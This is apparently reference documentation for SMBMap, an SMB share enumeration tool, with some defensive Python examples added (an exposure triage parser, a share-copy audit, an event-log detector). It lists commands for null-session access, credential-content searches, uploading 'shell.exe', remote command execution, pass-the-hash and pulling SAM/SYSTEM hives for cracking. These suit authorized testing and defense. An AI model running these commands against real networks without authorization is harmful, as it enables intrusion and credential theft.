
SMBMap

Overview

SMBMap is an SMB enumeration tool written in Python that lists SMB shares and the permissions the supplied account has on them, on a single host or across every host in a domain. It is used in SMB security testing to find exposed shares and sensitive files on Windows networks.

Installation

Linux / macOS

# Via pip (recommended)
pip3 install smbmap

# Via git
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip3 install -r requirements.txt
python3 smbmap.py --help

Windows

# Via pip
pip install smbmap

# Or download and run directly
python smbmap.py [options]

Docker

docker run -it --rm smbmap/smbmap:latest smbmap.py --help

Basic Usage

Help and Version

smbmap -h                           # Show help
smbmap --version                    # Show version

Required Parameters

-H, --host <ip>                    # Target host or IP
-u, --username <user>              # Username (optional for null sessions)
-p, --password <pass>              # Password
-d, --domain <domain>              # Domain name

Null Session Enumeration

Enumerate Without Credentials

smbmap -H 192.168.1.100                                    # No auth
smbmap -H 192.168.1.100 -u '' -p ''                      # Null session with explicit empty creds
smbmap -H 192.168.1.100 -u 'anonymous'                   # Anonymous user

Check for Null Session Vulnerability

smbmap -H 192.168.1.100 2>&1 | grep -E 'READ|WRITE'
# smbmap prints permissions as NO ACCESS, READ ONLY or READ, WRITE; any READ or WRITE returned without credentials is a null-session exposure

Guest and Unauthenticated Access

smbmap -H 192.168.1.100 -u 'guest' -p ''                 # Guest account
smbmap -H 192.168.1.100 --no-color                       # Disable color output

Authenticated Enumeration

Basic Authentication

smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Username/password
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass'  # With domain

List All Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Shows all accessible shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L          # List only shares (compact)

Check Specific Share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$'     # Enumerate C$ share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users'  # Enumerate Users share

Share and Permission Enumeration

Share Enumeration Output

smbmap -H 192.168.1.100 -u 'admin' -p 'pass'
# Output shows one row per share:
# Disk | Permissions | Comment
# IPC$ | NO ACCESS | (null)
# ADMIN$ | READ, WRITE | Remote Admin
# C$ | NO ACCESS | Default share
# Users | READ ONLY | User directory

Identify Writable Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep WRITE

Parse Results for Analysis

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q          # Quiet mode (minimal output)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v          # Report the remote OS version
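The share table above is what most smbmap workflows end up grepping. As an added example (not part of this cheat sheet and not smbmap's own code), the Python below parses that table, accepting both smbmap's tab-separated Disk / Permissions / Comment layout and the pipe-delimited layout used in this section, and triages it from the share owner's side: anything a null session can read or write, plus writable shares, with the default administrative shares called out separately. The two listings embedded in it are constructed sample output; the host name and share names are invented.

```python
"""Triage smbmap share listings for exposure (added example, not smbmap code).

Parses the per-host share table smbmap prints (Disk / Permissions / Comment,
tab-separated) and the pipe-delimited layout used in this cheat sheet, then
reports what a share review asks: what is reachable without credentials, and
which shares are writable. The listings below are constructed, not captures.
"""
import re
from dataclasses import dataclass

# Permission strings smbmap prints in the Permissions column
PERM_RE = re.compile(r"NO ACCESS|READ, WRITE|READ ONLY|WRITE ONLY|READ|WRITE", re.I)
DEFAULT_ADMIN_SHARES = {"ADMIN$", "C$", "IPC$", "PRINT$"}

# Constructed: a null-session run (smbmap -H host) in smbmap's own column layout
ANON_RUN = (
    "[+] IP: 192.168.1.100:445\tName: fileserver.example.test\n"
    "        Disk                                                  \tPermissions\tComment\n"
    "\t----                                                  \t-----------\t-------\n"
    "\tADMIN$                                            \tNO ACCESS\tRemote Admin\n"
    "\tC$                                                \tNO ACCESS\tDefault share\n"
    "\tIPC$                                              \tREAD ONLY\tRemote IPC\n"
    "\tPublic                                            \tREAD, WRITE\tDrop folder\n"
)

# Constructed: an authenticated run, in the pipe-delimited form shown above
AUTH_RUN = """\
[+] IP: 192.168.1.100:445 | Name: fileserver.example.test
Share name | Permissions | Comment
IPC$ | READ ONLY | (null)
ADMIN$ | READ, WRITE | Remote Admin
C$ | NO ACCESS | Default share
Users | READ ONLY | User directory
Public | READ, WRITE | Drop folder
"""


@dataclass(frozen=True)
class ShareEntry:
    host: str
    name: str
    perms: str
    comment: str


def parse_smbmap(output: str) -> list:
    """Return one ShareEntry per share row; the host comes from the preceding '[+] IP:' line."""
    entries, host = [], "unknown"
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        ip = re.search(r"IP:\s*([0-9A-Za-z.\-]+)", line)
        if ip:
            host = ip.group(1)
            continue
        if "|" in line:
            cols = [c.strip() for c in line.split("|")]
        else:
            cols = [c.strip() for c in re.split(r"\t+|\s{2,}", line)]
        # Skip the rule line, banners and any row without a permission column
        if len(cols) < 2 or set(cols[0]) <= {"-"}:
            continue
        perm_idx = next((i for i, c in enumerate(cols) if PERM_RE.fullmatch(c)), None)
        if perm_idx is None or perm_idx == 0:
            continue  # header rows ("Disk ... Permissions ...") land here too
        entries.append(ShareEntry(host, cols[0], cols[perm_idx].upper(),
                                  " | ".join(cols[perm_idx + 1:])))
    return entries


def triage(anon_entries, auth_entries) -> dict:
    """Group findings by the question a share review asks."""
    findings = {"anonymous_access": [], "writable": [], "writable_admin_share": []}
    for e in anon_entries:
        if e.perms != "NO ACCESS":
            findings["anonymous_access"].append(f"\\\\{e.host}\\{e.name} ({e.perms})")
    for e in auth_entries:
        if "WRITE" in e.perms:
            key = "writable_admin_share" if e.name.upper() in DEFAULT_ADMIN_SHARES else "writable"
            findings[key].append(f"\\\\{e.host}\\{e.name} ({e.perms})")
    return findings


if __name__ == "__main__":
    for kind, items in triage(parse_smbmap(ANON_RUN), parse_smbmap(AUTH_RUN)).items():
        print(f"{kind}: {items or 'none'}")
```

Feed it the saved output of a null-session run and an authenticated run of the same host; the anonymous findings are the ones to fix first, since they need no credential at all, and a writable ADMIN$ or C$ for an ordinary account is the precondition for the remote execution sections below.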

File Enumeration

Recursive File Listing

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users'
# Recursively list all files in the Users share (-r lists a single directory; -R recurses)

List Specific Directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users\Documents'
# List the Documents folder recursively (the path is given as share\folder)

Find Files by Pattern

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users' | grep -iE '\.(txt|pdf|xlsx?)$'

File Download and Upload

Download Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --download 'Users\Documents\file.txt'
# Download a file to the current directory (the path is share\folder\file)

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --download 'C$\Windows\System32\config\SAM'
# Download the SAM hive (requires admin); the live hive is held open by the OS, so this read normally fails with a sharing violation

Download Entire Directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users\Documents' -A '.'
# -A downloads every file whose name matches the regex during the recursive listing; '.' matches all names

Upload Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --upload 'shell.exe' 'Users\shell.exe'
# Upload shell.exe to the root of the Users share (--upload takes a local source and a share\path destination)

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --upload 'shell.exe' 'Users\Temp\shell.exe'
# Upload to a specific directory

Search for Keywords in Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -F 'password|secret|api' --search-path 'C:\Users'
# Search file contents for sensitive keywords; -F runs PowerShell on the target, so it needs admin rights (default search path is C:\Users)

Search Specific File Extensions

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users' -A '\.(txt|conf)$'
# -A is a file name regex applied during -r/-R; files whose names match are downloaded

Output Search Results

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R 'Users' -g results.txt
# -g writes the -r/-R listing in a grep-friendly form; --csv results.csv writes CSV instead

Remote Command Execution

Execute Commands (Requires Admin)

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'ipconfig'
# Execute ipconfig command

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami'
# Check current user context

Execute with Specific Share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'cmd.exe /c whoami'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'ADMIN$' -x 'powershell.exe'

Execute Multiple Commands

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami && hostname && systeminfo'

Pass-the-Hash Attacks

Using NTLM Hash

smbmap -H 192.168.1.100 -u 'admin' -p '8846f7eaee8fb117ad06bdd830b7586c:8846f7eaee8fb117ad06bdd830b7586c'
# Format: LM:NT hash (can be same if only NT available)

PTH with Domain

smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'hash:hash'

Combine with Command Execution

smbmap -H 192.168.1.100 -u 'admin' -p 'hash:hash' -x 'whoami'

Domain Enumeration

Scan Network Range

for ip in 192.168.1.{1..254}; do
  timeout 2 smbmap -H "$ip" -u 'guest' -p '' 2>/dev/null | grep -qE 'READ|WRITE' && echo "Found: $ip"
done
# Permissions are printed as READ ONLY / READ, WRITE / NO ACCESS; --host-file does the same sweep in a single run

Enumerate All Domain Machines

smbmap --host-file hosts.txt -u 'admin' -p 'pass' -L
# -L against a host list (one address per line) shows the shares on every reachable machine

Find Printers and Shared Resources

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep -iE 'print|share|backup'

Common Flags Reference

Flag               Description
-H HOST            Target host IP or hostname
--host-file FILE   File with one target host per line
-u USER            Username for authentication
-p PASS            Password, or LM:NT hash for pass-the-hash
-d DOMAIN          Domain name (for domain users)
-P PORT            SMB port (default 445)
-L                 List shares only (no file enumeration)
-s SHARE           Limit enumeration to a single share
-r [PATH]          List the contents of a directory (default: the root of every share)
-R [PATH]          Recursively list directories and files
-A PATTERN         File name regex; matching files are downloaded (used with -r or -R)
-F PATTERN         File content search (runs PowerShell on the target; needs admin)
--download PATH    Download a file (share\path\file)
--upload SRC DST   Upload a local file to share\path\file
-x COMMAND         Execute a command on the target (needs admin)
-g FILE            Write -r/-R results to a grep-friendly file
--csv FILE         Write results as CSV
-q                 Quiet mode
-v                 Report the remote OS version
--no-color         Disable colored output
--timeout SECS     Socket timeout in seconds (slow or filtered networks)

Integration with Other Tools

CrackMapExec Integration

# SMBMap can be chained with CrackMapExec for comprehensive testing
cme smb 192.168.1.0/24 -u admin -p password --shares
# Then use smbmap for deeper enumeration

crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'  # For execution

NetExec (CrackMapExec Successor)

nxc smb 192.168.1.100 -u admin -p pass --shares
# Modern alternative to CrackMapExec

Combine with Enum4linux

enum4linux 192.168.1.100                    # Get user/group info
smbmap -H 192.168.1.100 -u 'user' -p 'pass' # Then enumerate shares

Export to Tools like BloodHound

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --csv shares.csv
# Keep the share access results next to the BloodHound AD data; smbmap output is not a BloodHound import format, so correlate it by host and user

Advanced Techniques

Enumerate Hidden Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L
# -L lists every share, including the ones ending in $ that are hidden from browse lists

Find Domain Admin Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L | grep -i 'admin\|domain\|netlogon\|sysvol'

Backup File Discovery

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R -A '\.(bak|sql|db|backup)$'
# -A is a file name regex: backups and database dumps matching it are downloaded during the recursive listing
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -R -A '\.(conf|config|ini|xml|json)$'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -F 'password|api|secret' --search-path 'C:\Users'
# -F searches file contents (runs PowerShell on the target; needs admin rights)
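The -A and -F options used in the "Search for Keywords in Files" sections and in the backup discovery above select files in two different ways: -A matches file names, -F matches file contents. As an added example (not smbmap's own code), the Python below performs both selections over a local directory tree, which is the position a share owner is in when auditing a copy of their own share for misplaced credentials, backups and database dumps. The tree and its contents are constructed in a temporary directory; the two patterns mirror the ones used in those sections.

```python
"""Name-pattern versus content-pattern selection over a share mirror.

Added example, not smbmap code: reproduces over a local directory the two
selections smbmap makes with -A (file name regex, no file is opened) and
-F (file content regex), for auditing a copy of a share. The sample tree
below is constructed; the file bodies are invented.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample tree standing in for a mirrored 'Users' share
SAMPLE_FILES = {
    "Documents/notes.txt": "meeting at 10\n",
    "Documents/app.conf": "db_password = Winter2024!\n",
    "Documents/export.sql": "INSERT INTO users VALUES ('a','b');\n",
    "Backups/site.bak": "binary-ish\x00data\n",
    "Pictures/holiday.jpg": "\xff\xd8not really a jpeg\n",
    "Scripts/deploy.ps1": "$apiKey = 'sk_test_placeholder'\n",
}

# The patterns the cheat sheet uses for -A (names) and -F (contents)
NAME_PATTERN = re.compile(r"\.(bak|sql|db|backup|conf|config|ini|xml|json)$", re.I)
CONTENT_PATTERN = re.compile(r"password|api[_-]?key|secret", re.I)


def build_sample_tree(root: Path) -> None:
    """Write the constructed files under root."""
    for rel, body in SAMPLE_FILES.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="latin-1")


def match_names(root: Path, pattern: re.Pattern) -> list:
    """-A style: select by file name only; the files are never opened."""
    return sorted(p.relative_to(root).as_posix()
                  for p in root.rglob("*") if p.is_file() and pattern.search(p.name))


def match_contents(root: Path, pattern: re.Pattern, max_bytes: int = 1_000_000) -> dict:
    """-F style: select by content, reporting the matching line numbers per file."""
    hits = {}
    for p in root.rglob("*"):
        if not p.is_file() or p.stat().st_size > max_bytes:
            continue  # skip oversized files rather than reading them whole
        text = p.read_bytes().decode("latin-1")  # lossless for arbitrary bytes
        lines = [n for n, line in enumerate(text.splitlines(), 1) if pattern.search(line)]
        if lines:
            hits[p.relative_to(root).as_posix()] = lines
    return hits


def audit() -> tuple:
    """Build the sample tree and return (name matches, content matches)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return match_names(root, NAME_PATTERN), match_contents(root, CONTENT_PATTERN)


if __name__ == "__main__":
    names, hits = audit()
    print("by name   :", names)
    print("by content:", hits)
```

The two result sets overlap only where a file both has a telling name and a telling body (app.conf here); deploy.ps1 is found only by content and site.bak only by name, which is why the cheat sheet pairs -A and -F rather than relying on either alone.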

Privilege Escalation Path Finding

# Download the SYSTEM and SAM hives for offline cracking (requires admin)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --download 'C$\Windows\System32\config\SYSTEM'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --download 'C$\Windows\System32\config\SAM'
# The live hives are held open by the OS, so these reads normally fail with a sharing violation

Troubleshooting

Connection Refused

# Ensure SMB port 445 is open
nmap -p 445 192.168.1.100

# Specify a non-default port or a longer socket timeout
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -P 445 --timeout 5

Authentication Failed

# Verify credentials and domain (pass the domain with -d, not as a DOMAIN\user prefix)
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'admin' -p 'password'

# Failed logons count toward the domain lockout threshold, so do not retry with guessed passwords; confirm the rights of the working credentials instead
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'admin' -p 'password' --admin

Command Execution Not Working

# Requires admin rights on the target (the C$ and ADMIN$ shares must be accessible)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'whoami'

# For a domain account, pass the domain with -d
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass' -x 'whoami'

Timeout Issues

# Raise the socket timeout (seconds) for slow or filtered networks
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --timeout 10

Security Notes

  • Always obtain proper authorization before testing SMB shares
  • Null sessions may be disabled on modern systems but are still worth checking
  • Pass-the-hash requires the user's NTLM hash (not the cleartext password)
  • Command execution typically requires local admin or SYSTEM access
  • Monitor logs for SMBMap activity (Event ID 4625 for failed logins)
  • Use VPN/proxies appropriately for remote engagements
  • Handle credentials securely (passing -p on the command line leaves them in shell history)

Related Tools

  • nmap — Network scanning and SMB enumeration
  • enum4linux — Linux-based SMB enumeration
  • CrackMapExec — Comprehensive SMB exploitation framework
  • NetExec — Modern successor to CrackMapExec
  • smbclient — Command-line SMB/CIFS client
  • impacket — Python library for SMB protocol manipulation
  • Metasploit — Framework with SMB modules
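The security notes say to monitor logs for SMBMap activity and name Event ID 4625. As an added example (not part of this cheat sheet), the Python below runs three detection rules over Windows Security log events as a SIEM would export them, using the event XML data names (LogonType, TargetUserName, IpAddress, ShareName): a 4624 network logon as ANONYMOUS LOGON, which is what a null session produces; a burst of 4625 failures from one source, which is what credential testing or the per-host guest loop above produces; and 5140 access to ADMIN$ or C$, the precondition for the command execution sections. The events, addresses and account names are constructed.

```python
"""Detect the Security-log footprint of SMB share enumeration.

Added example, not smbmap code. Three rules over constructed Windows Security
events (field names follow the event XML data a SIEM exports):
  4624 with LogonType 3 and TargetUserName ANONYMOUS LOGON  -> null session
  FAILED_LOGON_THRESHOLD x 4625 from one source within WINDOW -> credential testing
  5140 access to an administrative share                    -> admin share access
"""
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SHARES = {"ADMIN$", "C$"}   # IPC$ left out: anonymous IPC$ binds are routine noise
FAILED_LOGON_THRESHOLD = 5
WINDOW = timedelta(minutes=2)

SCANNER = "10.0.0.25"   # constructed source address of the enumerating host
EVENTS = [
    {"time": "2024-05-01T09:00:01", "id": 4624, "LogonType": 3,
     "TargetUserName": "ANONYMOUS LOGON", "IpAddress": SCANNER},
    {"time": "2024-05-01T09:00:02", "id": 5140, "SubjectUserName": "ANONYMOUS LOGON",
     "IpAddress": SCANNER, "ShareName": "\\\\*\\IPC$"},
] + [
    # five failed logons for one account, 5 seconds apart
    {"time": f"2024-05-01T09:00:{10 + 5 * i:02d}", "id": 4625,
     "TargetUserName": "admin", "IpAddress": SCANNER} for i in range(5)
] + [
    {"time": "2024-05-01T09:01:00", "id": 4624, "LogonType": 3,
     "TargetUserName": "admin", "IpAddress": SCANNER},
    {"time": "2024-05-01T09:01:02", "id": 5140, "SubjectUserName": "admin",
     "IpAddress": SCANNER, "ShareName": "\\\\*\\ADMIN$"},
    # benign background: a backup account on its own share, one typo'd password
    {"time": "2024-05-01T09:01:30", "id": 5140, "SubjectUserName": "svc_backup",
     "IpAddress": "10.0.0.9", "ShareName": "\\\\*\\Backups"},
    {"time": "2024-05-01T09:02:00", "id": 4625, "TargetUserName": "jdoe", "IpAddress": "10.0.0.9"},
]


def detect(events) -> list:
    """Return (rule, source_ip, detail) tuples in time order."""
    alerts = []
    recent_failures = defaultdict(list)   # source ip -> failure timestamps inside WINDOW
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        src = ev.get("IpAddress", "-")
        if (ev["id"] == 4624 and ev.get("LogonType") == 3
                and ev.get("TargetUserName", "").upper() == "ANONYMOUS LOGON"):
            alerts.append(("null_session", src, f"anonymous network logon from {src}"))
        elif ev["id"] == 4625:
            bucket = recent_failures[src]
            bucket.append(t)
            while t - bucket[0] > WINDOW:   # slide the window
                bucket.pop(0)
            if len(bucket) == FAILED_LOGON_THRESHOLD:   # fire once, as the threshold is crossed
                alerts.append(("failed_logon_burst", src,
                               f"{FAILED_LOGON_THRESHOLD} failed logons in {WINDOW.seconds}s from {src}"))
        elif ev["id"] == 5140:
            share = ev.get("ShareName", "").rsplit("\\", 1)[-1].upper()
            if share in ADMIN_SHARES:
                alerts.append(("admin_share_access", src,
                               f"{ev.get('SubjectUserName', '?')} opened {share} from {src}"))
    return alerts


if __name__ == "__main__":
    for rule, src, detail in detect(EVENTS):
        print(f"[{rule}] {src}: {detail}")
```

Event 5140 only appears when the Audit File Share subcategory (Object Access) is enabled, and 4624/4625 need Audit Logon; without those settings the rules have nothing to read. The null-session rule is the one worth acting on at the policy level: the "Network access: Do not allow anonymous enumeration of SAM accounts and shares" setting removes the exposure the Null Session section tests for.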